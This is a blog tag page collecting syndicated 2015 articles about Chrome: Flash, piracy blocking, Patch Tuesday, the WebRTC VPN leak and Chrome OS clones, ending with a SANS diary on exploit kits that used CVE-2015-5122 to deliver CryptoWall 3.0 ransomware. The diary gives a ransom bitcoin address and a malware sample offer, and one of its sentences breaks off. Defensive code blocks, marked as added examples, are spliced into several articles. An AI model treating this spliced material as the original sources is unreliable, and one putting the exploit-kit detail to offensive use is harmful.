Posts tagged ‘chrome’

LWN.net: Starting in September, Chrome will stop auto-playing Flash ads

This post was syndicated from: LWN.net and was written by: n8willis. Original post: at LWN.net

Google has announced that, beginning September 1, Chrome will no longer auto-play Flash-based ads in the company’s popular AdWords program. The post frames this as a move to improve browsing performance for users, and notes that most Flash ads are automatically converted to HTML5 already. Commenting on the news, The Register notes that the change should also offer some additional protection against malware delivered via Flash. Chrome will continue to auto-play Flash content in the main body of pages, however. The Register’s story says the change is, in fact, just a modification of the default setting for plugin behavior, which already supports an option to disable plugin content not deemed “important.” Mozilla, of course, blacklisted the Flash plugin in July, although that action only disabled the then-current, vulnerable release—which was subsequently updated.

TorrentFreak: Should Web Browsers Block Copyright Infringing URLs?

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

With more than 150 million active users per month, uTorrent is without a doubt the most popular file-sharing application.

Many people use the software to download pirated material, which worries copyright holder groups such as the RIAA.

Earlier this month the music group sent a letter to uTorrent’s parent company BitTorrent Inc. urging it to do something about this unauthorized use. Ideally, the RIAA would like infringing hashes to be banned so that users can no longer share these files.

“We are willing to establish a process to share the hashes with BitTorrent Inc. on a regular basis so that BitTorrent Inc. can use the information to deter further infringement of those files via its goods and services,” the RIAA wrote in a letter to the company.

Technically speaking it’s quite easy to block hashes. Several BitTorrent trackers already do this to keep copyright holders appeased, but thus far this has been a bridge too far for the company behind uTorrent.

BitTorrent Inc. hasn’t responded to our repeated requests for comment, but in a brief statement provided to Venturebeat the company notes that the protocol is open source, legal and that they themselves don’t host any infringing content. This is true, but the response also misses the main point.

The RIAA’s request isn’t about the protocol or the technology. It’s about adding a piracy prevention mechanism to a neutral piece of software. Should BitTorrent be obliged to do that?

Legally speaking BitTorrent Inc isn’t required to take any action. Browser developers don’t have to block infringing URLs either, even though hundreds of millions of people use their software to download or stream pirated content.

However, the RIAA’s letter shows that the music group is trying to shift this obvious boundary, and they are not only focusing on BitTorrent.

TF has learned that the RIAA and MPAA are pushing for automated pirate site blocking/warning technology. Outright takedown requests to browser vendors are not going to happen anytime soon, but subtle changes may appear.

The RIAA previously noted that it would like Google to expand Chrome’s malware warning system to cover pirate sites. This would mean that users see a red warning screen when they attempt to visit known piracy sites.

For its part the MPAA is actively lobbying for “site scoring” tools behind closed doors. A leaked copy of the group’s anti-piracy strategies lists site scoring services, which identify pirate sites, as a high priority.

The Hollywood group writes that these pirate site lists can then be used as a blocking tool by advertisers, payment processors, domain name registrars, hosting providers and search engines. Web browsers are not mentioned specifically, but it’s not hard to imagine these also appearing on the MPAA’s wish list.

In any case, the efforts outlined above show that copyright holders would like to extend anti-piracy measures beyond traditional service providers to software vendors. Today it’s BitTorrent clients but browser vendors may be next.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

Krebs on Security: Adobe, MS Push Patches, Oracle Drops Drama

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe today pushed another update to seal nearly three dozen security holes in its Flash Player software. Microsoft also released 14 patch bundles, including a large number of fixes for computers running its new Windows 10 operating system. Not to be left out of Patch Tuesday, Oracle‘s chief security officer lobbed something of a conversational hand grenade into the security research community, which responded in kind and prompted Oracle to back down.

Adobe’s latest patch for Flash (it has issued more than a dozen this year alone) fixes at least 34 separate security vulnerabilities in Flash and Adobe AIR. Mercifully, Adobe said this time around it is not aware of malicious hackers actively exploiting any of the flaws addressed in this release.

Adobe recommends users of Adobe Flash Player on Windows and Macintosh update to Adobe Flash Player 18.0.0.232. Adobe Flash Player installed with Google Chrome will be automatically updated to the latest Google Chrome version, which will include Adobe Flash Player 18.0.0.232 on Windows and Macintosh, and version 18.0.0.233 for Linux and Chrome OS.

However, I would recommend that if you use Flash, you should strongly consider removing it, or at least hobbling it until and unless you need it. Disabling Flash in Chrome is simple enough, and can be easily reversed: On a Windows, Mac, Linux or Chrome OS installation of Chrome, type “chrome:plugins” into the address bar, and on the Plug-ins page look for the “Flash” listing: To disable Flash, click the disable link (to re-enable it, click “enable”). Windows users can remove Flash from the Add/Remove Programs panel, or use Adobe’s uninstaller for Flash Player.

If you’re concerned about removing Flash altogether, consider a dual-browser approach. That is, unplugging Flash from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Flash.

If you decide to proceed with Flash and update, the most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera).

MICROSOFT

Microsoft may have just released Windows 10 as a free upgrade to Windows 7 and 8 customers, but some 40 percent of the patches released today apply to the new flagship OS, according to a tally by security firm Qualys. There is even an update for Microsoft Edge, the browser that Microsoft wants to replace Internet Explorer.

Nevertheless, IE gets its own critical update (MS15-089), which addresses at least 13 flaws — most of which can be exploited remotely without any help from the user, save from perhaps just visiting a hacked or malicious site.

Another notable update plugs scary-looking flaws in Microsoft Office (MS15-081). Qualys says it appears the worst of the flaws fixed in the Office patch could be triggered automatically — possibly through the Outlook e-mail preview pane, for example.

According to security firm Shavlik, there are two flaws fixed in today’s release from Microsoft that are being actively exploited in the wild: One fixed in the Office Patch (CVE-2015-1642) and another in Windows itself (CVE-2015-1769). Several other vulnerabilities fixed today were publicly disclosed prior to today, increasing the risk that we could see public exploitation of these bugs soon.

If you run Windows, take some time soon to back up your data and update your system. As ever, if you experience any issues as a result of applying any of these updates, please leave a note about your experience in the comments section.

ORACLE

I’ve received questions from readers about a rumored software update for Java (Java 8, Update 60); I have no idea where this is coming from, but this should not be a security-related patch. Generally speaking, even-numbered Java updates are non-security related. More importantly, Oracle has moved to releasing security updates for Java on a quarterly patch cycle, except for extreme emergencies (and I’m unaware of a dire problem with Java right now, aside perhaps from having this massively buggy and insecure program installed in the first place).

Alas, not to be left out of the vulnerability madness, Oracle’s Chief Security Officer Mary Ann Davidson published a provocative blog post titled “Don’t, Just Don’t” that stirred up quite a tempestuous response from the security community today.

Davidson basically said security researchers who try to reverse engineer the company’s code to find software flaws are violating the legal agreement they acknowledged when installing the software. She also chastised researchers for spreading “a pile of steaming FUD” (a.k.a. Fear, Uncertainty and Doubt).

Oracle later unpublished the post (it is still available in Google’s cache here), but not before Davidson’s rant was lampooned endlessly on Twitter and called out by numerous security firms. My favorite so far came from Twitter user small_data, who said: “The City of Rome’s EULA stipulates Visigoths cannot recruit consultants who know about some hidden gate to gain entry.”

Images posted by Twitter users posting to the sarcastic hashtag #oraclefanfic

TorrentFreak: Google Publishes Chrome Fix For Serious VPN Security Hole

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

As large numbers of Internet users wise up to seemingly endless online privacy issues, security products are increasingly being viewed as essential for even basic tasks such as web browsing.

In addition to regular anti-virus, firewall and ad-busting products, users wishing to go the extra mile often invest in a decent VPN service, which allows them to hide their real IP addresses from the world. Well, that’s the theory at least.

In January this year, details of a serious vulnerability revealed that in certain situations third parties were able to discover the real IP addresses of Chrome and Firefox users even though they were connected to a VPN.

This wasn’t the fault of any VPN provider though. The problem was caused by features present in WebRTC, an open-source project supported by Google, Mozilla and Opera.

By placing a few lines of code on a website and using a STUN server it became possible to reveal not only users’ true IP addresses, but also their local network address too.

While users were immediately alerted to broad blocking techniques that could mitigate the problem, it’s taken many months for the first wave of ‘smart’ solutions to arrive.

Following on the heels of a Chrome fix published by Rentamob earlier this month which protects against VPN leaks while leaving WebRTC enabled, Google has now thrown its hat into the ring.

Titled ‘WebRTC Network Limiter’, the tiny Chrome extension (just 7.31KB) disables the WebRTC multiple-routes option in Chrome’s privacy settings while configuring WebRTC not to use certain IP addresses.

In addition to hiding local IP addresses that are normally inaccessible to the public Internet (such as 192.168.1.1), the extension also stops other public IP addresses being revealed.

“Any public IP addresses associated with network interfaces that are not used for web traffic (e.g. an ISP-provided address, when browsing through a VPN) [are hidden],” Google says.

“Once the extension is installed, WebRTC will only use public IP addresses associated with the interface used for web traffic, typically the same addresses that are already provided to sites in browser HTTP requests.”

While both the Google and Rentamob solutions provide more elegant responses to the problem than previously available, both admit to having issues.

“Some WebRTC functions, like VOIP, may be affected by the multiple routes disabled setting. This is unavoidable,” Rentamob explains.

Google details similar problems, including issues directly linked to funneling traffic through a VPN.

“This extension may affect the performance of applications that use WebRTC for audio/video or real-time data communication. Because it limits the potential network paths, WebRTC may pick a path that results in significantly longer delay or lower quality (e.g. through a VPN). We are attempting to determine how common this is,” the company concludes.

After applying the blocks and fixes detailed above, Chrome users can check for IP address leaks by using sites including IPLeak and BrowserLeaks.
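The candidate lines a page receives from the browser can also be inspected offline to see which addresses WebRTC would hand out. The classifier below is an added example, not code from the article or from Google's extension; its candidate lines, addresses, and function names are constructed for illustration (real lines can be copied from chrome://webrtc-internals).

```javascript
// Added example (not from the original article): classify the addresses in
// ICE candidate lines and flag those a VPN user would not expect a site to see.

// RFC 1918, link-local and loopback ranges: addresses that exist only inside
// the user's own network and should never reach a remote site.
const PRIVATE_V4 = [
  /^10\./, /^172\.(1[6-9]|2\d|3[01])\./, /^192\.168\./, /^169\.254\./, /^127\./,
];

// Pull the address and candidate type out of one SDP candidate line:
// "candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type> ..."
function parseCandidate(line) {
  const m = /candidate:\S+ \d+ \S+ \d+ (\S+) \d+ typ (\S+)/.exec(line);
  return m ? { address: m[1], type: m[2] } : null;
}

function classifyAddress(addr) {
  // An mDNS name (x.local) is an obfuscated host candidate and reveals nothing.
  if (/\.local$/i.test(addr)) return 'mdns';
  if (addr.includes(':')) {
    // IPv6: link-local (fe80::) and unique-local (fc00::/7) are private.
    return /^(fe80:|f[cd])/i.test(addr) ? 'private' : 'public';
  }
  return PRIVATE_V4.some((re) => re.test(addr)) ? 'private' : 'public';
}

// Report every candidate that tells a site more than it already learns from
// HTTP requests: expectedPublic is the address sites see anyway (the VPN exit).
function findLeaks(lines, expectedPublic) {
  const leaks = [];
  for (const line of lines) {
    const c = parseCandidate(line);
    if (!c) continue;
    const kind = classifyAddress(c.address);
    if (kind === 'private') {
      leaks.push({ ...c, reason: 'local network address exposed' });
    } else if (kind === 'public' && c.address !== expectedPublic) {
      leaks.push({ ...c, reason: 'public address differs from the one seen over HTTP' });
    }
  }
  return leaks;
}

// Constructed sample: a VPN user with LAN address 192.168.1.23, VPN tunnel
// address 10.8.0.2, ISP-side public address 203.0.113.45 and VPN exit address
// 198.51.100.7. Only the exit address is what sites already see.
const SAMPLE_CANDIDATES = [
  'candidate:1 1 udp 2122260223 192.168.1.23 54321 typ host generation 0',
  'candidate:2 1 udp 2122194687 10.8.0.2 54322 typ host generation 0',
  'candidate:3 1 udp 1686052607 203.0.113.45 54321 typ srflx raddr 192.168.1.23 rport 54321 generation 0',
  'candidate:4 1 udp 1685987071 198.51.100.7 54322 typ srflx raddr 10.8.0.2 rport 54322 generation 0',
];

function demo() {
  const leaks = findLeaks(SAMPLE_CANDIDATES, '198.51.100.7');
  for (const l of leaks) {
    console.log(`${l.type.padEnd(5)} ${l.address.padEnd(15)} ${l.reason}`);
  }
  return leaks;
}

demo();
```

With the limiter setting described above, only the candidate on the interface used for web traffic (the exit address here) should remain, and findLeaks reports nothing.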


Linux How-Tos and Linux Tutorials: Installing Android Apps on Linux with ARChon

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Figure 1: Android apps on Linux.

I’ve spent a lot of time on the Google Play Store. During that time I have discovered plenty of really useful apps that would be great on the Linux desktop. Fortunately, thanks to some crafty developers, it is quite possible (and actually easy) to run Android apps on the Linux desktop.

Of course, this statement does come with some caveats. First and foremost, this is all handled with the help of the Chrome browser. To make matters easier, you’ll need to be running the Chrome Developer channel. The second caveat is that not all apps will actually work. That some apps do not function should not surprise you (you won’t be getting an app that requires the functionality of a phone service to run on your desktop). As for other apps, the results can be hit and miss. The third caveat is that, to make this process easier, you’ll also need an Android device to package the .apk file that will be used on the desktop.

With that said, let’s dive into the process of getting Android apps running on Linux. I will be demonstrating on an Ubuntu 14.04 LTS installation.

Installing Chrome

If you haven’t already installed Chrome, let’s walk through that quick process. Remember, you’re installing the dev channel (you can safely install all three channels—stable, beta, and dev—on the same machine). Here’s how this is done:

  1. From the download page, select the installer associated with your package manager and architecture (because I’m using Ubuntu, I’ll download a .deb file)
  2. Click Accept and Install
  3. When prompted, select Open with and make sure /usr/bin/software-center (default) is selected
  4. Click OK
  5. When the Software Center opens, click Install
  6. When prompted, enter your sudo password
  7. Allow the installation to complete.

You should now find an entry for Google Chrome (unstable) in your Dash (Figure 1, above).

Installing ARChon

The tool that will do the heavy lifting for this task is called ARChon. This is an Android runtime, created by Vlad Filippov, which brings a specialized version of the Android runtime that works on the desktop version of Chrome. This phase of the process is also quite simple:

  1. Download the ARChon runtime for your architecture—32-bit or 64-bit
  2. Open your file manager and navigate to the Downloads directory (or wherever you have downloaded the .zip file)
  3. Right-click the ARChon zip file and select Extract Here
  4. Rename the newly created folder (right-click and select Rename) to archon
  5. Move the newly named folder to your home directory (right-click on archon, select Move To…, select Home, and click Select (Figure 2).


Adding ARChon to Chrome

It’s time to add the runtime to Chrome. This will enable you to finally run those Android apps on your desktop. Here’s how:

  1. Open Chrome
  2. Click on what is often referred to as the Overflow Menu (three horizontal bars in the top right corner)
  3. Select More tools > Extensions
  4. Click to enable Developer mode
  5. Click Load unpacked extension… (Figure 3)
  6. Navigate to your home directory
  7. Select archon
  8. Click Open. 


ARChon should now appear in the listing of Chrome extensions.

Generating APKs

Now we move over to the Android platform. It used to be necessary to build APK files manually (which wasn’t always successful). Thankfully, there are now apps for Android that can build APKs with a few taps. The app I prefer is called ARChon Packager and can be installed from within the Google Play Store for free. Install that app, and you’re ready to go.

With ARChon Packager, you can generate APKs from installed apps or from APKs within the phone’s storage. I highly recommend you install the desired app onto your phone and then have ARChon Packager generate the APK from the installed app.

Here’s how to use ARChon Packager. 

  1. Open the app from your Android device
  2. Tap NEXT
  3. Select Installed application and tap NEXT
  4. Select the app you want to install from the pop-up listing
  5. Select the necessary options for the app (Figure 4)
  6. Tap NEXT
  7. When the APK generation is complete, tap SHARE CHROME APPLICATION
  8. Share the file in whatever way will best allow you to save it to your desktop (I opted for Google Drive)
  9. Click FINISH when complete. 


Retrieve the file and save it to your ~/Downloads directory on your Linux PC.

Installing the APK

You’re ready to now install the app. This is done in the same manner as was ARChon. Here are the steps:

  1. Open up your file manager
  2. Navigate to the ~/Downloads directory
  3. Right-click the downloaded APK zip file
  4. Select Extract here
  5. Open Chrome
  6. Click the Overflow Menu
  7. Click More Tools > Extensions
  8. Click Load unpacked extension…
  9. Navigate to the ~/Downloads directory
  10. Select the folder for the newly extracted APK
  11. Click Open.

That’s it! Now, if the app is usable on the desktop version of Chrome, it should be ready to run.

Running the App

Chrome has a handy tool called Apps. Open Chrome and you should see a button in the upper left corner labeled Apps. Click on that and the newly installed apps will be ready to run. Click on the app you want to run to see how well it functions. To demonstrate, I installed the Nest App from the Google Play Store to find it runs flawlessly (Figure 5). 


The ability to easily run Android apps on Linux is a real boon to the desktop. Not only does this functionality extend the reach of the desktop, it empowers it to join the ever-expanding mobile generation. If you happen to enjoy the Android platform, give this a try and see how well your favorite mobile apps perform on the Linux desktop.

TorrentFreak: uTorrent Flagged As ‘Harmful’ by Anti-Virus Companies and Google

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

With millions of new downloads per month uTorrent is without doubt the most used BitTorrent client around.

The software is the main source of revenue for the San Francisco based company BitTorrent Inc. and generates income through advertisements and bundled software.

The latter now appears to be causing trouble as several anti-virus vendors have begun listing uTorrent as a security risk. The scanning result below from VirusTotal shows that at least six anti-virus applications, including ESET and Symantec, have flagged the software as problematic.

The anti-virus scans associate the uTorrent.exe file with Trojan.Win32.Generic!BT and the controversial OpenCandy bundling software. While this isn’t the first time that uTorrent has been flagged in this manner, we haven’t seen it being reported by this many independent tests before.

uTorrent’s VirusTotal results

In addition to action by the anti-virus companies, uTorrent is also being blocked by Google in several ways. When attempting to download the latest stable release of the torrent client, Chrome flags the software as malicious and blocks the download, although this only appears to happen sporadically.

Google is also actively blocking several pages that link to uTorrent and other BitTorrent Inc. software. According to Google, parts of the uTorrent website contain “harmful programs.”

uTorrent.com warning in Chrome

The same “harmful software” warning from Google also prevented millions of people from accessing popular torrent sites earlier this month.

A Google spokesperson informed us that this was the result of the company’s increased efforts to block programs that make “unexpected changes” to people’s computers.

“Google Safe Browsing’s ability to detect deceptive software has steadily improved,” the company explained in a recent blog post.

“In the coming weeks, these detection improvements will become more noticeable in Chrome: users will see more warnings about unwanted software than ever before,” Google adds.

These and the other uTorrent threat reports all seem to be triggered by the bundled third-party software. There is no indication or evidence that the BitTorrent client itself is harmful.

We asked BitTorrent Inc. for a comment on the recent reports but the company has yet to respond.


Linux How-Tos and Linux Tutorials: Which Linux Chrome OS Clone is Right For You?

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Solus desktop

When the Chromebook first arrived on the scene, most people thought they’d go the way of the netbook. Maybe the little laptops that could would hang around for a brief period and, once the novelty of the price tag wore off, they’d go away to make room for the devices that do the real work. 

Thing is, said real work (from an end-user perspective) tends to be 90 percent browser based. So the Chromebook hung around and eventually became one of the hottest selling devices on the market. Beyond price, one of the reasons for the incredible popularity of the Chromebook is its simplicity. Across the landscape of the PC-verse, it doesn’t get much easier than ChromeOS. However, because Chrome OS is a proprietary solution, owned by Google, you cannot simply download the platform and install it on common x86/64 hardware. To get around that, there are approximations available that can be installed on off-the-shelf hardware that recreate the Chrome OS experience. 

With that in mind, it makes perfect sense that a handful of Chrome OS-like Linux distributions would appear. In theory, it’s a perfect amalgamation of simplicity and power. You get the ease of use found with ChromeOS and the added power of the full-blown Linux platform. 

But if you’re looking to get such elegant simplicity with the added power, where do you turn? A handful of Linux distributions have popped up over the last few years that do an outstanding job of re-creating ChromeOS. Which of these do the best job of mimicking Chrome OS and which manage to retain all that which makes Linux an outstanding platform?

Here are my top contenders for this title.

Solus

Solus started out as Evolve OS and is, to date, one of the finest Linux distributions to take a swing at the Chrome OS platform. The developers of Solus promise a “no scope-creep” platform that will provide a modern desktop-focused Linux distribution. Under the hood, Solus is pure Linux. In this case, it’s what’s on top that counts… that being the Budgie desktop (Figure 1).

This is a singular desktop environment created to almost perfectly mimic the Chrome OS experience. Budgie does integrate with the GNOME stack, so there is not only the familiar minimalism of Chrome OS, but the power of GNOME underneath. Another unique feature of Solus is the package manager. Forked from Pardus Linux, the package manager offers the same level of simplicity found in Budgie (Figure 2).

budgie desktop

What is most impressive about Solus is that this is a fairly new project and is already enjoying an amazing level of stability. Once installed, you’d think you were using a distribution that’s been around the block a few times. Consider this—Solus started out as Evolve OS and the beta of the initial release was only just available January 2015. Now dubbed Solus, the platform is already a production-ready desktop. Another very impressive aspect of Solus is how much thought was put into the overall design. Each and every tool was perfectly themed to retain the look and feel of Solus throughout.

If you’re looking for the one distribution that best fits the Chrome OS mode, and adds just enough Linux to make it more flexible than the official release, Solus is what you’re looking for.

Chromixium

Chromixium is next in line for the title of best in breed for ChromeOS clone. This particular take on Chrome OS is based on Ubuntu Linux, so it already has quite a lot going for it. But the bits and pieces of Ubuntu are mostly under the hood. It’s what’s on top of the hood that will interest most Linux users. The Chromixium distribution uses an old-school approach with the help of the Openbox Window Manager (a derivation of the original Blackbox WM).

What sets Chromixium apart from Solus is the menu system. If you look on the desktop (Figure 3), you’ll find the ChromeOS-looking menu button that you can click to gain access to all the Googly-goodness the desktop has to offer. 

Figure 3: The Chromixium Google menu.

If, however you right-click anywhere on the desktop, you’ll find an Openbox menu ready to give you access to all of the Linux-goodness the desktop has to offer (Figure 4). 

Figure 4: The Chromixium “Linux” menu.

At first, this might seem like a clunky means to handle the desktop menu system. However having the Google bits isolated from everything else does make for an efficient means of isolating searches (as you can search Google from the Chromixium desktop menu).

If you’re looking for a ChromeOS-like Linux distribution that offers a nod to a bit of old-school Linux, give Chromixium a go.

Chromium OS

Chromium OS is an open source project that forms the base of Google’s Chrome OS. This means you can expect a fairly pure form of Chrome OS on your standard hardware. Of course, getting ChromiumOS up and running isn’t nearly as simple as that of either Solus or Chromixium. For ChromiumOS, you either run the platform from a USB flash drive or from a virtual image (with the help of VirtualBox) and then install the platform. This fact does make ChromiumOS a bit of a challenge for the average user, but if you’re interested, you can follow these steps to get ChromiumOS ready to run from a USB drive: 

  1. Download the appropriate image (according to your architecture)
  2. Insert a flash drive
  3. Extract the downloaded file
  4. Open a terminal window
  5. Change into the directory containing the newly extracted image file
  6. Issue the command (with admin rights, either by switching to root with su or by using sudo) dd if=ChromeOS.img of=/dev/sdX bs=4M (where ChromeOS.img is the full name of the image file and sdX is the location of your flash drive*)
  7. Allow the command to finish
  8. You should now have a bootable Chromium OS USB drive.

* To find out the location of the mounted flash drive, you can issue the command mount and check for the exact location of the drive.

NOTE: If the above instructions fail to produce a working bootable USB drive, you can try using the Win32 Image Writer instead (you’ll need a working copy of Windows for this).
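A wrong device name in step 6 overwrites whatever disk sdX actually is, so the lookup in the footnote is worth turning into a pre-flight check. The script below is an added example, not from the article: it refuses targets that are not whole, removable, unmounted disks before running the article's dd command. The function names, the SYSFS/MOUNTS overrides and the fake sysfs entries used to exercise it are assumptions.

```shell
#!/bin/sh
# Added example (not from the original article): pre-flight checks before
# "dd if=ChromeOS.img of=/dev/sdX bs=4M". SYSFS and MOUNTS default to the
# live system; they can be pointed at a constructed tree for testing.
SYSFS="${SYSFS:-/sys}"
MOUNTS="${MOUNTS:-/proc/mounts}"

# is_safe_target NAME (e.g. sdb): succeeds only if /dev/NAME is a whole disk
# that the kernel marks removable and nothing on it is currently mounted.
is_safe_target() {
    name="$1"
    blk="$SYSFS/block/$name"
    # Partitions such as sdb1 have no top-level /sys/block entry, so this
    # also rejects partition names: the image must go to the whole stick.
    if [ ! -d "$blk" ]; then
        echo "refusing $name: not a whole-disk block device" >&2
        return 1
    fi
    # The kernel reports 1 for USB sticks and SD cards, 0 for fixed disks,
    # which catches the classic mistake of typing the system disk's name.
    if [ "$(cat "$blk/removable" 2>/dev/null)" != "1" ]; then
        echo "refusing $name: sysfs does not mark it removable" >&2
        return 1
    fi
    # A filesystem mounted from the stick must be unmounted before dd, and a
    # device carrying a mounted filesystem is the wrong target anyway.
    if grep -q "^/dev/$name[0-9]* " "$MOUNTS"; then
        echo "refusing $name: it or one of its partitions is mounted" >&2
        return 1
    fi
    return 0
}

# write_image IMAGE NAME: the article's dd command, gated on the checks above.
write_image() {
    image="$1"
    name="$2"
    if [ ! -f "$image" ]; then
        echo "image not found: $image" >&2
        return 1
    fi
    is_safe_target "$name" || return 1
    sudo dd if="$image" of="/dev/$name" bs=4M && sync
}
```

Run it as write_image ChromeOS.img sdb after unmounting the stick; the checks print the reason whenever they refuse.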

Once you have Chromium OS up and running, you can install the operating system to your hard drive but it will erase your entire drive (You can dual boot but you must install the other OS first and it’s not nearly as easy as dual booting with a standard Linux OS). Also, just to be safe, unplug any external or internal drives that contain data you do not want erased. For information on the actual installation of Chromium OS, check out the official how-tos here and here.

As you might expect, Chromium OS is that which Chrome OS is built upon, so you won’t find any extra Linux goodness within the menu. But, if you’re looking for a pure Chrome OS experience on your non-chromebook hardware, this is the way to go.

Which ChromeOS clone is best?

Which route you take to Chrome OS depends on your needs. If you’re looking for Pure Chrome OS, you’ll want to go with Chromium OS. If you’re looking for a nearly-identical Chrome OS experience, with an additional boost from the Linux desktop, go with Solus. If you want the best of both worlds, give Chromixium a try.

One way or another, you’ll have the look and feel of Chrome OS working on your non-Chromebook hardware.

SANS Internet Storm Center, InfoCON: green: After Flash, what will exploit kits focus on next?, (Thu, Jul 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Introduction

Adobe has received some bad publicity regarding zero-day Flash player exploits due to the recent Hacking Team compromise [1,2]. This certainly isn’t the first time Adobe has had such issues [3]. With HTML5 video as an alternative to Flash player, one might wonder how long Flash player will be relevant. Google has announced the next stable version of Chrome will block auto-playing Flash elements [4], and Firefox started blacklisting Flash player plugins earlier this week [5]. With people like Facebook’s chief security officer calling for Adobe to announce an end-of-life date for Flash [6], I’ve been wondering about the future of Flash player.

More specifically, I’ve been wondering what exploit kit (EK) authors will turn to once Flash player is no longer relevant.

In recent months, most EK traffic I’ve generated used a Flash exploit to infect vulnerable Windows hosts. The situation with Flash player today is much like the situation with Java that I remember from 2013 and most of 2014. However, in the fall of 2014, most EKs dropped Java exploits from their arsenal and started relying on Flash player as a vehicle for their most up-to-date exploits.

A recent history of Java exploits in EK traffic

Java exploits were prevalent when I first started blogging about EK traffic in 2013 [7]. Back then, Blackhole EK was still a player, and I commonly saw Java exploits in EK traffic.

The threat landscape altered a bit when the EK’s alleged creator, Paunch, was arrested. Organizations that monitor EK traffic noticed a sharp reduction of Blackhole EK traffic in 2014 compared to the previous year [8]. During that same time, I started noticing more Flash exploits in EK traffic. By September 2014, most of the remaining EKs had stopped using Java.

My last documented dates for Java exploits in exploit kit traffic are below (exploit kit name, followed by the date a Java exploit was last seen).

  • Angler EK – 2014-09-16 [9]
  • FlashPack EK – 2014-08-30 [10]
  • Nuclear EK – 2014-09-08 [11]
  • Magnitude EK – 2014-08-15 [12]
  • Sweet Orange EK – 2014-09-25 [13]
  • Rig EK – 2014-09-06 [14]

Of note, FlashPack EK and Sweet Orange EK have disappeared, and they are not currently a concern. Neutrino EK was dormant from April through October of 2014, and when it came back, I didn’t see it using any Java exploits.

Fiesta EK still sends several different types of exploits depending on the vulnerable client, and it still has Java exploits in its arsenal. Other lesser-seen EKs like KaiXin still use Java exploits. However, the majority of EKs gave up on Java sometime last year.

What we're recently seeing with Flash exploits

Most exploit kits use the latest available Flash exploits. Angler, Neutrino, Nuclear, Magnitude, and Rig EK are all using the latest Hacking Team Flash player exploit based on CVE-2015-5122 [15]. If you have Flash player on a Windows computer, you should be running the most recent Flash update (version 18.0.0.209 as I'm writing this).
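As an added example (not part of the diary above or its author's tooling), the following Python check flags installed Flash versions that are older than the 18.0.0.209 release the diary names as current; the host inventory it triages is constructed, and the numeric comparison avoids the string-ordering mistake that would rank "18.0.0.9" above "18.0.0.209".

```python
"""Flag Flash Player builds older than the patched release named on the page.

Added example, not the diary's own code. PATCHED_FLASH is the version the
diary cites as current (18.0.0.209); the inventory below is constructed.
"""
from typing import Dict, Iterable, List, Optional, Tuple

PATCHED_FLASH = "18.0.0.209"  # release the diary names as current


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn a dotted Flash version such as '18.0.0.203' into a tuple of ints.

    Comparing tuples of ints gives the right order; comparing the raw strings
    would rank '18.0.0.9' above '18.0.0.209' because '9' > '2' as characters.
    Short versions are padded so '18.0' compares like '18.0.0.0'.
    """
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {version!r}")
    nums = tuple(int(p) for p in parts)
    return nums + (0,) * (4 - len(nums))


def needs_update(installed: str, patched: str = PATCHED_FLASH) -> bool:
    """True when the installed build is strictly older than the patched one."""
    return parse_version(installed) < parse_version(patched)


def triage(inventory: Iterable[Tuple[str, Optional[str]]]) -> Dict[str, List[str]]:
    """Sort (hostname, flash_version_or_None) pairs into action buckets.

    Hosts without Flash are listed separately: they are not at risk from a
    Flash exploit, and that is the diary's preferred end state anyway.
    Unparseable version strings are reported rather than silently skipped,
    since an unknown version cannot be assumed safe.
    """
    result: Dict[str, List[str]] = {
        "update": [], "current": [], "no_flash": [], "unknown": []
    }
    for host, version in inventory:
        if version is None:
            result["no_flash"].append(host)
            continue
        try:
            bucket = "update" if needs_update(version) else "current"
        except ValueError:
            bucket = "unknown"
        result[bucket].append(host)
    return result


# Constructed sample inventory (hostnames and values are made up).
SAMPLE_INVENTORY = [
    ("ws-01", "18.0.0.203"),   # the build the diary's infected host ran
    ("ws-02", "18.0.0.209"),   # already on the patched release
    ("ws-03", "18.0.0.194"),   # older build, also needs the update
    ("ws-04", None),           # Flash not installed
    ("ws-05", "18.0.0.9"),     # older build that a string compare would miss
    ("ws-06", "unknown"),      # inventory agent could not read a version
]

if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{bucket:8s} {', '.join(hosts) or '-'}")
```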

Earlier I generated Angler EK traffic to infect a Windows host running Flash player 18.0.0.203 on IE 11.

Shown above: An image of the Angler EK infection and post-infection CryptoWall 3.0 traffic in Wireshark.

Shown above: Angler EK sending a Flash exploit, based on CVE-2015-5122, targeting Flash 18.0.0.203.

The infected host's bitcoin address for ransom payment was 1LY58fiaAYFKgev67TN1UJtRveJh81D2dU. The address is the same one
Shown above: Decrypt instructions from the infected host.

Final words

Today, the majority of EKs utilize Flash player exploits based on the most recently known vulnerabilities. But this situation can't last forever. If Flash is no longer relevant, what will EK authors turn to for their latest exploits? Will they go back to Java? Will they focus on browser vulnerabilities? It will be interesting to see where things stand in the next year or so.

A pcap of the 2015-07-15 Angler EK infection traffic is available at:

A zip file of the associated malware is available at:

The zip file is password-protected with the standard password. If you don't know it, email admin@malware-traffic-analysis.net and ask.


Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net – Twitter: @malware_traffic

References:

[1] https://krebsonsecurity.com/2015/07/adobe-to-patch-hacking-teams-flash-zero-day/
[2] http://www.pcworld.com/article/2947312/second-flash-player-zeroday-exploit-found-in-hacking-teams-data.html
